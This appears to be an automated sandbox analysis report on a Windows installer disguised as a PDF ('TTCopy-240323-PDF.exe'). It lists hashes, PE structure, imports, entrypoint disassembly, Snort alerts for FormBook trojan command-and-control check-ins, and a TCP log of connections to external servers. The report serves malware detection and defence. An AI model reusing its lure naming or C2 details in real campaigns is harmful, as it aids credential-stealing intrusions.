                                                                                          Preview:.005m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e...548.r...t..w.(058.q..v..I.0A..q..34.q.p.}..u.{.w....}.p013......u.L.4F".u..04.t.t.q..p.x.u....q.8580..Y...}..E.4D'.q..80.}.t.t..w.p.p...X+AK..M......v.ZXK.J.E.....}.]..O.F.....u.X_.M.M......H...X...K.D.....}.\&....A..B....G...P5..O.E..P....\...Y...K.E..a....B...].4.T.4.q0.p..q..~<1|..x.q.>.t&.u.|1,.t..w.pe..\...w.p..u.T.4.Q.0.}.;.q%..5M%.}.;.qm..tL9.}.5013.6.].5.u...K...P3480..u...dR0.m...D4...B358.q.0342.}.e......dX4R0]<048[3^2^8Z5..p...d.a..

                                                                                          C:\Users\user\AppData\Local\Temp\nsn334E.tmp

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\TTCopy-240323-PDF.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):315937
                                                                                          Entropy (8bit):7.611820675736579
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:T67HAcuskgENWbs2FOCWFsROufj/NADzlfxQEuZMsFcKRGh:WsdgEobsdCWKtNEViFn
                                                                                          MD5:892220608EC0E266B05338E1EE0F939E
                                                                                          SHA1:7560CCBFDD3F2F3451CB2AF22EBC08A38C1BE966
                                                                                          SHA-256:4D278E30C0826555150802FCC61880E9CEE62DAFDA1EB8CC5B089826A77759A5
                                                                                          SHA-512:C22604536C4DDBE2250DE0BBA2C96C07410CF581B77A65C1A6F0D14EBC62ABB588990F0FC7B31CADA5083A6C3AD63481D1B346FE0C98FCE6A4778FAE504B1797
                                                                                          Malicious:false
                                                                                          Preview:........,...................i...X........-..................................................................................................................................................................................................................................................G...............%...j...............................................................................................................................y...........5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                          Entropy (8bit):7.926142185582782
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:TTCopy-240323-PDF.exe
                                                                                          File size:300661
                                                                                          MD5:348e51874930db41b232a0bab0a4c040
                                                                                          SHA1:acac6fe84007d3d4fe18b38ed48e2892969aade0
                                                                                          SHA256:7b8a4cea9f76cf8dec6243f6103244578618081c05cb9927a9b7f619c32d956c
                                                                                          SHA512:c21407ec8d402f8fb09ae4f4553b44c7b6e0bd9c73cba2fc3be6d7f3e811587880f4703535a82c68abdcd41e8bc92a087a3e8ccc21f3c91134d0400364fa44f0
                                                                                          SSDEEP:6144:lYa6+jWEbungXc5BK5jruw+hOmdRe5BHMdtl5nC1Azy:lYUrCnQtTOOmdIOdDty
                                                                                          TLSH:6F5412A5FEE0D477D876C3310D3F863AEBF2992295B6911313612619F867242ED0F362
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                                                          File Icon

                                                                                          Icon Hash:64ccc4d6e8f4d6c4

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x403640
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:61259b55b8912888e90f516ca08dc514

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          sub esp, 000003F4h
                                                                                          push ebx
                                                                                          push esi
                                                                                          push edi
                                                                                          push 00000020h
                                                                                          pop edi
                                                                                          xor ebx, ebx
                                                                                          push 00008001h
                                                                                          mov dword ptr [ebp-14h], ebx
                                                                                          mov dword ptr [ebp-04h], 0040A230h
                                                                                          mov dword ptr [ebp-10h], ebx
                                                                                          call dword ptr [004080C8h]
                                                                                          mov esi, dword ptr [004080CCh]
                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                          push eax
                                                                                          mov dword ptr [ebp-0000012Ch], ebx
                                                                                          mov dword ptr [ebp-2Ch], ebx
                                                                                          mov dword ptr [ebp-28h], ebx
                                                                                          mov dword ptr [ebp-00000140h], 0000011Ch
                                                                                          call esi
                                                                                          test eax, eax
                                                                                          jne 00007F8888ABC12Ah
                                                                                          lea eax, dword ptr [ebp-00000140h]
                                                                                          mov dword ptr [ebp-00000140h], 00000114h
                                                                                          push eax
                                                                                          call esi
                                                                                          mov ax, word ptr [ebp-0000012Ch]
                                                                                          mov ecx, dword ptr [ebp-00000112h]
                                                                                          sub ax, 00000053h
                                                                                          add ecx, FFFFFFD0h
                                                                                          neg ax
                                                                                          sbb eax, eax
                                                                                          mov byte ptr [ebp-26h], 00000004h
                                                                                          not eax
                                                                                          and eax, ecx
                                                                                          mov word ptr [ebp-2Ch], ax
                                                                                          cmp dword ptr [ebp-0000013Ch], 0Ah
                                                                                          jnc 00007F8888ABC0FAh
                                                                                          and word ptr [ebp-00000132h], 0000h
                                                                                          mov eax, dword ptr [ebp-00000134h]
                                                                                          movzx ecx, byte ptr [ebp-00000138h]
                                                                                          mov dword ptr [0042A318h], eax
                                                                                          xor eax, eax
                                                                                          mov ah, byte ptr [ebp-0000013Ch]
                                                                                          movzx eax, ax
                                                                                          or eax, ecx
                                                                                          xor ecx, ecx
                                                                                          mov ch, byte ptr [ebp-2Ch]
                                                                                          movzx ecx, cx
                                                                                          shl eax, 10h
                                                                                          or eax, ecx

                                                                                          Rich Headers

                                                                                          Programming Language:
                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x2388.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0x3b0000x23880x2400False0.7991536458333334data7.026554027867032IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountry
                                                                                          RT_ICON0x3b1d80x1994PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                          RT_DIALOG0x3cb700x100dataEnglishUnited States
                                                                                          RT_DIALOG0x3cc700x11cdataEnglishUnited States
                                                                                          RT_DIALOG0x3cd900x60dataEnglishUnited States
                                                                                          RT_GROUP_ICON0x3cdf00x14dataEnglishUnited States
                                                                                          RT_VERSION0x3ce080x23cdataEnglishUnited States
                                                                                          RT_MANIFEST0x3d0480x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                                          Imports

                                                                                          DLLImport
                                                                                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States

                                                                                          Network Behavior

                                                                                          Snort IDS Alerts

                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                          192.168.2.6145.239.252.4949710802031453 03/30/23-10:23:54.354365TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.6145.239.252.49
                                                                                          192.168.2.685.187.128.3449734802031412 03/30/23-10:25:22.472262TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.685.187.128.34
                                                                                          192.168.2.6194.58.112.17449743802031449 03/30/23-10:26:03.804330TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.6194.58.112.174
                                                                                          192.168.2.6145.239.252.4949756802031449 03/30/23-10:26:54.408302TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.6145.239.252.49
                                                                                          192.168.2.685.187.128.3449734802031449 03/30/23-10:25:22.472262TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.685.187.128.34
                                                                                          192.168.2.6194.58.112.17449743802031412 03/30/23-10:26:03.804330TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.6194.58.112.174
                                                                                          192.168.2.6145.239.252.4949756802031412 03/30/23-10:26:54.408302TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.6145.239.252.49
                                                                                          192.168.2.6145.239.252.4949710802031449 03/30/23-10:23:54.354365TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.6145.239.252.49
                                                                                          192.168.2.6145.239.252.4949756802031453 03/30/23-10:26:54.408302TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975680192.168.2.6145.239.252.49
                                                                                          192.168.2.6145.239.252.4949710802031412 03/30/23-10:23:54.354365TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.6145.239.252.49
                                                                                          192.168.2.6194.58.112.17449743802031453 03/30/23-10:26:03.804330TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.6194.58.112.174
                                                                                          192.168.2.685.187.128.3449734802031453 03/30/23-10:25:22.472262TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973480192.168.2.685.187.128.34

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Mar 30, 2023 10:23:43.197571993 CEST4970780192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:23:43.235022068 CEST804970745.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:23:43.235304117 CEST4970780192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:23:43.235479116 CEST4970780192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:23:43.272658110 CEST804970745.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:23:43.276165009 CEST804970745.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:23:43.276217937 CEST804970745.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:23:43.276385069 CEST4970780192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:23:43.276541948 CEST4970780192.168.2.645.136.196.215
                                                                                          Mar 30, 2023 10:23:43.313687086 CEST804970745.136.196.215192.168.2.6
                                                                                          Mar 30, 2023 10:23:48.346443892 CEST4970880192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:48.375161886 CEST8049708145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:48.375372887 CEST4970880192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:48.375561953 CEST4970880192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:48.404037952 CEST8049708145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:48.405769110 CEST8049708145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:48.405838966 CEST8049708145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:48.406013966 CEST4970880192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:49.899266005 CEST4970880192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:51.441912889 CEST4970980192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:51.470627069 CEST8049709145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:51.471079111 CEST4970980192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:51.507385969 CEST4970980192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:51.536047935 CEST8049709145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:51.536094904 CEST8049709145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:51.538744926 CEST8049709145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:51.538774967 CEST8049709145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:51.538921118 CEST4970980192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:53.314265966 CEST4970980192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:54.324970007 CEST4971080192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:54.353669882 CEST8049710145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:54.353825092 CEST4971080192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:54.354365110 CEST4971080192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:54.383404016 CEST8049710145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:54.385090113 CEST8049710145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:54.385128975 CEST8049710145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:54.395853996 CEST4971080192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:54.396290064 CEST4971080192.168.2.6145.239.252.49
                                                                                          Mar 30, 2023 10:23:54.424918890 CEST8049710145.239.252.49192.168.2.6
                                                                                          Mar 30, 2023 10:23:59.509481907 CEST4971180192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:23:59.529802084 CEST804971181.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:23:59.529934883 CEST4971180192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:23:59.530241013 CEST4971180192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:23:59.550209999 CEST804971181.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:23:59.554888964 CEST804971181.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:23:59.555074930 CEST804971181.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:23:59.555161953 CEST4971180192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:01.042603970 CEST4971180192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:02.066345930 CEST4971280192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:02.086566925 CEST804971281.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:02.086869955 CEST4971280192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:02.087157011 CEST4971280192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:02.107219934 CEST804971281.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:02.107254982 CEST804971281.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:02.113265038 CEST804971281.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:02.113359928 CEST804971281.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:02.113504887 CEST4971280192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:03.588905096 CEST4971280192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:04.606791973 CEST4971380192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:04.627060890 CEST804971381.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:04.630405903 CEST4971380192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:04.630667925 CEST4971380192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:04.650729895 CEST804971381.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:04.656905890 CEST804971381.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:04.656977892 CEST804971381.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:04.657252073 CEST4971380192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:04.657466888 CEST4971380192.168.2.681.17.29.150
                                                                                          Mar 30, 2023 10:24:04.677488089 CEST804971381.17.29.150192.168.2.6
                                                                                          Mar 30, 2023 10:24:09.768559933 CEST4971480192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:09.961302996 CEST8049714199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:09.961563110 CEST4971480192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:10.002274990 CEST4971480192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:10.194878101 CEST8049714199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:10.197375059 CEST8049714199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:10.197426081 CEST8049714199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:10.197565079 CEST4971480192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:11.517231941 CEST4971480192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:12.665436029 CEST4971580192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:12.858150959 CEST8049715199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:12.858376026 CEST4971580192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:12.860430956 CEST4971580192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:13.052926064 CEST8049715199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:13.057002068 CEST8049715199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:13.057046890 CEST8049715199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:13.057229996 CEST4971580192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:14.371208906 CEST4971580192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:15.388542891 CEST4971680192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:15.581276894 CEST8049716199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:15.581434011 CEST4971680192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:15.581645012 CEST4971680192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:15.774111986 CEST8049716199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:15.776103973 CEST8049716199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:15.776190996 CEST8049716199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:15.776530981 CEST4971680192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:15.776925087 CEST4971680192.168.2.6199.231.66.204
                                                                                          Mar 30, 2023 10:24:15.969331980 CEST8049716199.231.66.204192.168.2.6
                                                                                          Mar 30, 2023 10:24:21.018208027 CEST4971780192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:21.385209084 CEST8049717156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:21.385430098 CEST4971780192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:21.387026072 CEST4971780192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:21.770243883 CEST8049717156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:21.820714951 CEST8049717156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:21.820753098 CEST8049717156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:21.820777893 CEST8049717156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:21.820827961 CEST4971780192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:21.820827961 CEST4971780192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:22.888936996 CEST4971780192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:23.906537056 CEST4971880192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:24.261121988 CEST8049718156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:24.261358976 CEST4971880192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:24.261650085 CEST4971880192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:24.624319077 CEST8049718156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:24.670191050 CEST8049718156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:24.670249939 CEST8049718156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:24.670290947 CEST8049718156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:24.670392036 CEST4971880192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:25.762804031 CEST4971880192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:26.779880047 CEST4971980192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:27.135370970 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:27.135500908 CEST4971980192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:27.135699987 CEST4971980192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:27.472332954 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:27.548108101 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:27.548146009 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:27.548166990 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:27.548227072 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:27.548356056 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:27.548383951 CEST4971980192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:27.548484087 CEST4971980192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:27.548507929 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:27.548530102 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:27.548683882 CEST4971980192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:27.549073935 CEST4971980192.168.2.6156.226.207.81
                                                                                          Mar 30, 2023 10:24:27.889550924 CEST8049719156.226.207.81192.168.2.6
                                                                                          Mar 30, 2023 10:24:32.819364071 CEST4972080192.168.2.6173.199.124.126
                                                                                          Mar 30, 2023 10:24:32.920095921 CEST8049720173.199.124.126192.168.2.6
                                                                                          Mar 30, 2023 10:24:32.920367956 CEST4972080192.168.2.6173.199.124.126
                                                                                          Mar 30, 2023 10:24:32.920568943 CEST4972080192.168.2.6173.199.124.126
                                                                                          Mar 30, 2023 10:24:33.036650896 CEST8049720173.199.124.126192.168.2.6
                                                                                          Mar 30, 2023 10:24:33.036689043 CEST8049720173.199.124.126192.168.2.6
                                                                                          Mar 30, 2023 10:24:33.036876917 CEST4972080192.168.2.6173.199.124.126
                                                                                          Mar 30, 2023 10:24:34.466567039 CEST4972080192.168.2.6173.199.124.126
                                                                                          Mar 30, 2023 10:24:35.482817888 CEST4972180192.168.2.6173.199.124.126
                                                                                          Mar 30, 2023 10:24:35.581624031 CEST8049721173.199.124.126192.168.2.6
                                                                                          Mar 30, 2023 10:24:35.582758904 CEST4972180192.168.2.6173.199.124.126
                                                                                          Mar 30, 2023 10:24:35.583024025 CEST4972180192.168.2.6173.199.124.126
                                                                                          Mar 30, 2023 10:24:35.683054924 CEST8049721173.199.124.126192.168.2.6
                                                                                          Mar 30, 2023 10:24:35.683099031 CEST8049721173.199.124.126192.168.2.6
                                                                                          Mar 30, 2023 10:24:35.697581053 CEST8049721173.199.124.126192.168.2.6
                                                                                          Mar 30, 2023 10:24:35.697616100 CEST8049721173.199.124.126192.168.2.6
                                                                                          Mar 30, 2023 10:24:35.697707891 CEST4972180192.168.2.6173.199.124.126
